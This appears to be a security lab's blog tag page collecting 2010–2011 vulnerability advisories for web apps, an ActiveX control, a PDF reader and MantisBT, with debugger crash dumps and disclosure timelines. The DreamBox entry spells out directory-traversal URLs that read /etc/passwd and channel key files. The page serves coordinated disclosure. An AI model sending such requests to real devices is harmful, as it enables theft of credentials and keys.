Posts Tagged ‘ remote

Tugux CMS 1.2 Multiple Remote Vulnerabilities

The application suffers from multiple issues including: reflected and stored xss, sql Injection, local file inclusion, url redirection. Vulnerable parameters include: ‘name’, ‘comment’, ‘nid’, ‘submit1′, ‘email’, ‘topic_id’.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5014.php

DreamBox DM500(+) Arbitrary File Download Vulnerability

Dreambox suffers from a file download vulnerability thru directory traversal with appending the ‘/’ character in the HTTP GET method of the affected host address. The attacker can get to sensitive information like paid channel keys, usernames, passwords, config and plug-ins info, etc.

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5013.php

Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)

The ElonFmt ActiveX Control Module suffers from a buffer overflow vulnerability. When a large buffer is sent to the pid item of the GetItem1 function in elonfmt.ocx module, we get a few memory registers overwritten including the SEH. We’re dealing with a character translation. An attacker can gain access to the system on the affected node and execute arbitrary code.

—————————————————————–
CompanyName
FileDescription ElonFmt ActiveX Control Module
FileVersion 1, 1, 14, 1
InternalName ElonFmt
LegalCopyright Copyright (C) 2002 – 2008 Gesytec GmbH
OriginalFileName ElonFmt.OCX
ProductName ElonFmt ActiveX Control Module
ProductVersion 1, 1, 14, 1
—————————————————————–

Exception Code: ACCESS_VIOLATION
Disasm: AAAAAAAA ????? ()

Seh Chain:
————————————————–
1 7C9032BC ntdll.dll
2 AAAAAAAA

Registers:
————————————————–
EIP AAAAAAAA
EAX 00000000
EBX 00000000
ECX AAAAAAAA
EDX 7C9032BC -> 04244C8B
EDI 00000000
ESI 00000000
EBP 0013E7F8 -> 0013E8A8
ESP 0013E7D8 -> 7C9032A8

Block Disassembly:
————————————————–
AAAAAAAA ????? <--- CRASH ArgDump: -------------------------------------------------- EBP+8 0013E8C0 -> C0000005
EBP+12 0013ECF0 -> AAAAAAAA
EBP+16 0013E8DC -> 0001003F
EBP+20 0013E894 -> 7C96F3BC
EBP+24 AAAAAAAA
EBP+28 00000236

Stack Dump:
————————————————–
13EBA8 01 00 00 00 00 00 00 00 08 AF 47 00 81 18 C3 77 [……….G….w]
13EBB8 14 2C 00 00 A2 56 00 10 41 ED 13 00 E8 EB 13 00 […..V……….]
13EBC8 20 8F 63 01 B8 8E 63 01 81 18 C3 77 01 00 00 00 [..c…c….w….]
13EBD8 64 21 12 77 FF 00 00 00 74 E1 97 7C 51 7C 91 7C [d..w….t…Q…]
13EBE8 AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA […………….]

———————————————–

(fc.1608): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
cccccccc ?? ???
0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb
0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc mov ebx,0CCBBBBBBh
0013ecf5 cc int 3
0013ecf6 cc int 3
0013ecf7 cc int 3
0013ecf8 dddd fstp st(5)
0013ecfa dddd fstp st(5)
0013ecfc dddd fstp st(5)
0013ecfe dddd fstp st(5)

0:000> d esp
0013eb58 01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00 …..aS.|Zc…..
0013eb68 88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf ……..$FS…..
0013eb78 a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89 .Zc..Zc…..`)S.
0013eb88 ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00 ….h………..
0013eb98 06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e ……….st..C~
0013eba8 01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77 ……..@.G….w
0013ebb8 1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00 …..V……….
0013ebc8 20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00 .c…c….w….
0:000> d
0013ebd8 64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c d!.w….t..|Q|.|
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec58 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ec68 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec78 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec88 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec98 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013eca8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecb8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecc8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecd8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ece8 aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc …………….
0013ecf8 dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01 …………..c.
0013ed08 00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00 ……c………
0013ed18 82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00 ……….c.(…
0013ed28 00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73 ……c……C.s
0013ed38 5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10 \……………
0013ed48 80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01 ..c.$.V…..x.c.
0013ed58 48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00 H……………

Advisory ID: ZSL-2011-5011
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php

Anfibia Reactor 2.1.1 (login.do) Remote XSS POST Injection Vulnerability

Vendor: Anfibia Software
Product web page: http://www.anfibia-soft.com
Affected version: 2.1.1.12

Summary: Fast web-based server monitoring. Keep an eye on servers,
connections, databases, cpu, hard drives and more!

Desc: The Anfibia Reactor JS service suffers from a XSS vulnerability
when parsing user input to the ‘email’ parameter via POST method in
‘reactor/login.do’ script at the manager login interface. Attackers
can exploit this weakness to execute arbitrary HTML and script code
in a user’s browser session.

Tested on: Microsoft Windows XP Professional SP3 (EN)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com
Zero Science Lab – http://www.zeroscience.mk

[14.03.2011] Vulnerability discovered.
[16.03.2011] Contact with the vendor.
[16.03.2011] Vendor replies asking more details.
[16.03.2011] Sent vulnerability details to vendor.
[16.03.2011] Vendor confirms XSS issue.
[06.04.2011] Vendor releases version 3 to address this issue.
[06.04.2011] Coordinated public advisory released.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5008.php

DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities

DoceboLMS suffers from multiple stored XSS vulnerabilities pre and post auth. Input thru the POST parameters ‘name’, ‘code’ and ‘title’ in index.php is not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site. URI based XSS vulnerabilities are also present.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5006.php

Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection

FCMS suffers from a stored XSS vulnerability (post-auth) in messageboard.php script thru the ‘subject’ post parameter. XML Inj. lies in the ‘/inc/getChat.php’ script with ‘users’ get parameter with no args, and post parameter ‘message’.

Advisory ID: ZSL-2011-5004
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php

Nitro PDF Reader 1.4.0 Remote Heap Memory Corruption / DoS PoC

Nitro PDF Reader suffers from a heap corruption vulnerability which can be exploited by malicious people to cause a denial of service and potentially compromise a vulnerable system. The vulnerability is caused when processing malicious PDF file which triggers a heap corruption state resulting in a crash.

(bc8.b54): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0023f72c ebx=097e9c48 ecx=baadf00d edx=015ee620 esi=097e9c48 edi=097e1da0
eip=01604b77 esp=0023f708 ebp=00000000 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010282
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Nitro PDF\Reader\npdf.dll –
npdf!ProvideCoreHFT+0x170517:
01604b77 8b01 mov eax,dword ptr [ecx] ds:0023:baadf00d=????????
0:000> !load msec
0:000> !exploitable
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable – Data from Faulting Address controls Code Flow starting at npdf!ProvideCoreHFT+0x0000000000170517 (Hash=0x09746032.0x27746032)

The data from the faulting address is later used as the target for a branch.
0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0xffffffffbaadf00d
Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:014d4b77 mov eax,dword ptr [ecx]

Basic Block:
014d4b77 mov eax,dword ptr [ecx]
Tainted Input Operands: ecx
014d4b79 mov edx,dword ptr [eax]
Tainted Input Operands: eax
014d4b7b push 1
014d4b7d call edx
Tainted Input Operands: ecx, edx

Exception Hash (Major/Minor): 0x09746032.0x27746032

Stack Trace:
npdf!ProvideCoreHFT+0x170517
Instruction Address: 0x00000000014d4b77

Description: Data from Faulting Address controls Code Flow
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable – Data from Faulting Address controls Code Flow starting at npdf!ProvideCoreHFT+0x0000000000170517 (Hash=0x09746032.0x27746032)

The data from the faulting address is later used as the target for a branch.
0:000> !exploitable -m
IDENTITY:HostMachine\HostUser
PROCESSOR:X86
CLASS:USER
QUALIFIER:USER_PROCESS
EVENT:DEBUG_EVENT_EXCEPTION
EXCEPTION_FAULTING_ADDRESS:0xffffffffbaadf00d
EXCEPTION_CODE:0xC0000005
EXCEPTION_LEVEL:SECOND_CHANCE
EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION
EXCEPTION_SUBTYPE:READ
FAULTING_INSTRUCTION:014d4b77 mov eax,dword ptr [ecx]
BASIC_BLOCK_INSTRUCTION_COUNT:4
BASIC_BLOCK_INSTRUCTION:014d4b77 mov eax,dword ptr [ecx]
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:ecx
BASIC_BLOCK_INSTRUCTION:014d4b79 mov edx,dword ptr [eax]
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:eax
BASIC_BLOCK_INSTRUCTION:014d4b7b push 1
BASIC_BLOCK_INSTRUCTION:014d4b7d call edx
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:ecx
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:edx
MAJOR_HASH:0x09746032
MINOR_HASH:0x27746032
STACK_DEPTH:1
STACK_FRAME:npdf!ProvideCoreHFT+0x170517
INSTRUCTION_ADDRESS:0x00000000014d4b77
INVOKING_STACK_FRAME:0
DESCRIPTION:Data from Faulting Address controls Code Flow
SHORT_DESCRIPTION:TaintedDataControlsCodeFlow
CLASSIFICATION:PROBABLY_EXPLOITABLE
BUG_TITLE:Probably Exploitable – Data from Faulting Address controls Code Flow starting at npdf!ProvideCoreHFT+0x0000000000170517 (Hash=0x09746032.0x27746032)
EXPLANATION:The data from the faulting address is later used as the target for a branch.0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************

ww_0ccc058c\MFC80ENU.DLL
*************************************************************************
*** ***
*** ***
*** Your debugger is not using the correct symbols ***
*** ***
*** In order for this command to work properly, your symbol path ***
*** must point to .pdb files that have full type information. ***
*** ***
*** Certain .pdb files (such as the public OS symbols) do not ***
*** contain the required information. Contact the group that ***
*** provided you with these symbols if you need this command to ***
*** work. ***
*** ***
*** Type referenced: kernel32!pNlsUserInfo ***
*** ***
*************************************************************************
*************************************************************************
*** ***
*** ***
*** Your debugger is not using the correct symbols ***
*** ***
*** In order for this command to work properly, your symbol path ***
*** must point to .pdb files that have full type information. ***
*** ***
*** Certain .pdb files (such as the public OS symbols) do not ***
*** contain the required information. Contact the group that ***
*** provided you with these symbols if you need this command to ***
*** work. ***
*** ***
*** Type referenced: kernel32!pNlsUserInfo ***
*** ***
*************************************************************************

FAULTING_IP:
npdf!ProvideCoreHFT+170517
014d4b77 8b01 mov eax,dword ptr [ecx]

EXCEPTION_RECORD: ffffffff — (.exr 0xffffffffffffffff)
ExceptionAddress: 014d4b77 (npdf!ProvideCoreHFT+0x00170517)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: baadf00d
Attempt to read from address baadf00d

FAULTING_THREAD: 00000490

DEFAULT_BUCKET_ID: INVALID_POINTER_READ

PROCESS_NAME: NitroPDFReader.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 – The instruction at “0x%08lx” referenced memory at “0x%08lx”. The memory could not be “%s”.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 – The instruction at “0x%08lx” referenced memory at “0x%08lx”. The memory could not be “%s”.

EXCEPTION_PARAMETER1: 00000000

EXCEPTION_PARAMETER2: baadf00d

READ_ADDRESS: baadf00d

FOLLOWUP_IP:
npdf!ProvideCoreHFT+170517
014d4b77 8b01 mov eax,dword ptr [ecx]

NTGLOBALFLAG: 70

APPLICATION_VERIFIER_FLAGS: 0

PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ

BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ

LAST_CONTROL_TRANSFER: from 00000000 to 014d4b77

STACK_TEXT:
00000000 00000000 00000000 00000000 00000000 npdf!ProvideCoreHFT+0x170517

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: npdf!ProvideCoreHFT+170517

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: npdf

IMAGE_NAME: npdf.dll

DEBUG_FLR_IMAGE_TIMESTAMP: 4d2b1b47

STACK_COMMAND: ~0s ; kb

FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_npdf.dll!ProvideCoreHFT

BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_npdf!ProvideCoreHFT+170517

WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/NitroPDFReader_exe/1_4_0_11/4d2b1bc8/npdf_dll/1_4_0_11/4d2b1b47/c0000005/00174b77.htm?Retriage=1

Followup: MachineOwner
———

npdf!ProvideCoreHFT+0x170517:
01714b77 8b01 mov eax,dword ptr [ecx]
01714b79 8b10 mov edx,dword ptr [eax]
01714b7b 6a01 push 1
01714b7d ffd2 call edx
01714b7f 8b432c mov eax,dword ptr [ebx+2Ch]
01714b82 3bc5 cmp eax,ebp
01714b84 7409 je npdf!ProvideCoreHFT+0x17052f (01714b8f)

npdf!ProvideCoreHFT+0x170526:
01714b86 50 push eax
01714b87 e86ca10100 call npdf!ProvideCoreHFT+0x18a698 (0172ecf8)
01714b8c 83c404 add esp,4

npdf!ProvideCoreHFT+0x17052f:
01714b8f 8b7324 mov esi,dword ptr [ebx+24h]
01714b92 397320 cmp dword ptr [ebx+20h],esi
01714b95 8d7b1c lea edi,[ebx+1Ch]
01714b98 7605 jbe npdf!ProvideCoreHFT+0x17053f (01714b9f)

npdf!ProvideCoreHFT+0x17053a:
01714b9a e82c600200 call npdf!ProvideCoreHFT+0x19656b (0173abcb)

npdf!ProvideCoreHFT+0x17053f:
01714b9f 8b4704 mov eax,dword ptr [edi+4]
01714ba2 3b4708 cmp eax,dword ptr [edi+8]
01714ba5 89442414 mov dword ptr [esp+14h],eax
01714ba9 7609 jbe npdf!ProvideCoreHFT+0x170554 (01714bb4)

npdf!ProvideCoreHFT+0x17054b:
01714bab e81b600200 call npdf!ProvideCoreHFT+0x19656b (0173abcb)
01714bb0 8b442414 mov eax,dword ptr [esp+14h]

npdf!ProvideCoreHFT+0x170554:
01714bb4 56 push esi
01714bb5 57 push edi
01714bb6 50 push eax
01714bb7 57 push edi
01714bb8 8d442424 lea eax,[esp+24h]
01714bbc 50 push eax
01714bbd 8bcf mov ecx,edi
01714bbf e82c7afeff call npdf!ProvideCoreHFT+0x157f90 (016fc5f0)
01714bc4 8b4b14 mov ecx,dword ptr [ebx+14h]
01714bc7 8b5104 mov edx,dword ptr [ecx+4]
01714bca 8d7310 lea esi,[ebx+10h]
01714bcd 52 push edx
01714bce 8bce mov ecx,esi
01714bd0 e80b1eedff call npdf!ProvideCoreHFT+0x42380 (015e69e0)
01714bd5 8b4604 mov eax,dword ptr [esi+4]
01714bd8 894004 mov dword ptr [eax+4],eax
01714bdb 8b4604 mov eax,dword ptr [esi+4]
01714bde 896e08 mov dword ptr [esi+8],ebp
01714be1 8900 mov dword ptr [eax],eax
01714be3 8b4604 mov eax,dword ptr [esi+4]
01714be6 894008 mov dword ptr [eax+8],eax
01714be9 8b4340 mov eax,dword ptr [ebx+40h]
01714bec 3bc5 cmp eax,ebp
01714bee 7409 je npdf!ProvideCoreHFT+0x170599 (01714bf9)

npdf!ProvideCoreHFT+0x170590:
01714bf0 50 push eax
01714bf1 e802a10100 call npdf!ProvideCoreHFT+0x18a698 (0172ecf8)
01714bf6 83c404 add esp,4

npdf!ProvideCoreHFT+0x170599:
01714bf9 896b40 mov dword ptr [ebx+40h],ebp
01714bfc 896b44 mov dword ptr [ebx+44h],ebp
01714bff 896b48 mov dword ptr [ebx+48h],ebp
01714c02 8b4704 mov eax,dword ptr [edi+4]
01714c05 3bc5 cmp eax,ebp
01714c07 7409 je npdf!ProvideCoreHFT+0x1705b2 (01714c12)

npdf!ProvideCoreHFT+0x1705a9:
01714c09 50 push eax
01714c0a e8e9a00100 call npdf!ProvideCoreHFT+0x18a698 (0172ecf8)
01714c0f 83c404 add esp,4

npdf!ProvideCoreHFT+0x1705b2:
01714c12 896f04 mov dword ptr [edi+4],ebp
01714c15 896f08 mov dword ptr [edi+8],ebp
01714c18 896f0c mov dword ptr [edi+0Ch],ebp
01714c1b 8b4604 mov eax,dword ptr [esi+4]
01714c1e 8b08 mov ecx,dword ptr [eax]
01714c20 50 push eax
01714c21 56 push esi
01714c22 51 push ecx
01714c23 56 push esi
01714c24 8d44242c lea eax,[esp+2Ch]
01714c28 50 push eax
01714c29 8bce mov ecx,esi
01714c2b c7442440ffffffff mov dword ptr [esp+40h],0FFFFFFFFh
01714c33 e8e828edff call npdf!ProvideCoreHFT+0x42ec0 (015e7520)
01714c38 8b4e04 mov ecx,dword ptr [esi+4]
01714c3b 51 push ecx
01714c3c e8b7a00100 call npdf!ProvideCoreHFT+0x18a698 (0172ecf8)
01714c41 83c404 add esp,4
01714c44 896e04 mov dword ptr [esi+4],ebp
01714c47 896e08 mov dword ptr [esi+8],ebp
01714c4a 8b4c2424 mov ecx,dword ptr [esp+24h]
01714c4e 64890d00000000 mov dword ptr fs:[0],ecx
01714c55 59 pop ecx
01714c56 5f pop edi
01714c57 5e pop esi
01714c58 5d pop ebp
01714c59 5b pop ebx
01714c5a 83c41c add esp,1Ch
01714c5d c3 ret

0xBAADF00D (“bad food”) is used by Microsoft’s LocalAlloc(LMEM_FIXED) to indicate uninitialised allocated heap memory when the debug heap is used

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4999.php

Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC

A buffer overflow vulnerability has been identified in Macro Express Pro, possibly this vuln may exist in the regular version and older versions of Macro Express and Macro Express Pro. We’ve reported the issue to the vendor thru their bug reporting system (http://www.macros.com/bugreport.htm) and did not receive any response for confirmation or cooperation.

We’ve managed to overwrite few registers while debugging the application, thus executed arbitrary code on the affected system.

You can take a look at the advisory here: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4986.php

Embedthis Appweb Web Server 3.2.2-1 (Ejscript) Remote XSS Vulnerability

Appweb Web Server suffers from a remote reflected Cross-Site Scripting vulnerability when input passed to the Ejscript web framework is not properly sanitized, allowing the attacker to execute arbitrary HTML and script code in a user’s browser session and aid in phishing attacks.

Vendor releases version 3.2.3 to address this issue. Thanks to Michael for his cooperation ;)

Advisory ID: ZSL-2010-4985
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4985.php

Vendor: http://appwebserver.org/forum/viewtopic.php?f=1&t=1894

Mantis Bug Tracker безбедносни предупредувања и закрпи

Денеска, Zero Science Lab во соработка со MantisBT Group објави безбедносни предупредувања и закрпи за популарниот систем за следење на грешки или багови MantisBT (отворен код). Се работи за неколку сериозни ранливости со чија помош, напаѓачот може да дојде до осетливи информации на заразениот систем со пропатување на директориуми или пак да извршува HTML код во корисничкиот прелистувач со помош на XSS напад.

Слабоста се наоѓа во “upgrade_unattended.php” скриптата, која се наоѓа во “admin” папката. При повикување на параметарот “db_type” било со GET или POST методата, апликацијата не извшува доволно и контролирано санирање на корисничкото внесување при што се откриваат системски информации.

По дефинирање, се работи за Reflected (Non-persistent) Cross-Site Scripting, Local File Inclusion/Disclosure и Path Disclosure ранливости. Ние извршивме тестирање на “live” веб-страници (со дозвола), и заклучивме да ги рангираме ранливостите како Medium Risk (xss) и High Risk (lfi).

Голема благодарност до Дејвид Хикс и Виктор Боктор од MantisBT групата, кои одговорија на пријавените слабости и реагираа во најбрз временски период како и во објавување на закрпа и предупредувања после кое следеше објавување на 1.2.4 верзијата. Иако Дејвид напоменуваше дека имало “Warning” дека папката “admin” треба да се избрише после инсталација, јас такво предупредување не видов поради различните оперативни системи и PHP пермисии, и заклучивме дека многу инсталации на интернетот (кои користат MantisBT) се со присатен “admin” фолдер.

Освен јавно објавените предупредувања, објавивме и официјален Google Dork на Exploit-DB заедницата: http://www.exploit-db.com/ghdb/3651/

Предупредувањата од ZSL како и од MantisBT можете да ги погледнете подолу:

ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Cross-Site Scripting & Path Disclosure Vulnerability
ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Local File Inclusion Vulnerability
MantisBT: http://www.mantisbt.org/bugs/view.php?id=12607

Ажурирајте. ;}